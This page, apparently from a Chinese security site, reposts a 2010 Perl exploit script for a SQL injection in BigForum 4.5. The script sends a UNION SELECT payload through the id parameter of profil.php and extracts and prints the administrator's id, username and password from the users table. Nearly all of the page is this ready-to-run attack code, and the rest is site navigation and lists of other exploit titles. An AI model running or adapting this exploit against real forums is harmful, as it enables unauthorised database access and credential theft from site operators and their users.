首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BigForum Version 4.5 SQL Injection Vulnerability
来源:www.Ctacok.ru 作者:Ctacok 发布时间:2010-03-08  
================================================
BigForum Version 4.5 SQL Injection Vulnerability
================================================

#!/usr/bin/perl
 
use LWP::Simple;
 
print "\n";
 
print "##############################################################\n";
 
print "# BigForum Version: 4.5 SQL INJECTION                        #\n";
 
print "# Author: Ctacok  (Russian)                                  #\n";
 
print "# Blog : www.Ctacok.ru                                       #\n";
 
print "# Special for Antichat (forum.antichat.ru) and xakep.ru      #\n";
 
print "# Require : Magic_quotes = Off                               #\n";
 
print "##############################################################\n";
 
if (@ARGV < 2)
 
{
 
print "\n Usage: exploit.pl [host] [path] ";
 
print "\n EX : exploit.pl www.localhost.com /path/ \n\n";
 
exit;
 
}
 
$host=$ARGV[0];
 
$path=$ARGV[1];
 
$vuln = "-1'+union+select+1,concat(0x3a3a3a,id,0x3a,username,0x3a,pw,0x3a3a3a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+users";
 
$doc = get($host.$path."profil.php?id=".$vuln."+--+");
 
if ($doc =~ /:::(.+):(.+):(.+):::/){
 
         print "\n[+] Admin id: : $1";
 
print "\n[+] Admin username: $2";
 
print "\n[+] Admin password: $3";
 
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Yahoo Player 1.0 (.m3u) Local
·WebKit Style Tag Remote Denial
·Authentium Command Free Scan A
·Namoroka 3.6 Alpha 1 Remote Me
·Sagem Routers remote authentic
·Kolang (proc_open PHP safe mod
·ONECMS v2.5 SQL Injection Vuln
·Flare <= 0.6 Local Heap Overfl
·Sagem Routers Remote Auth bypa
·Yahoo Player v1.0 (.m3u/.pls/.
·Sagem Routers Remote Reset Exp
·JITed stage-0 shellcode
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved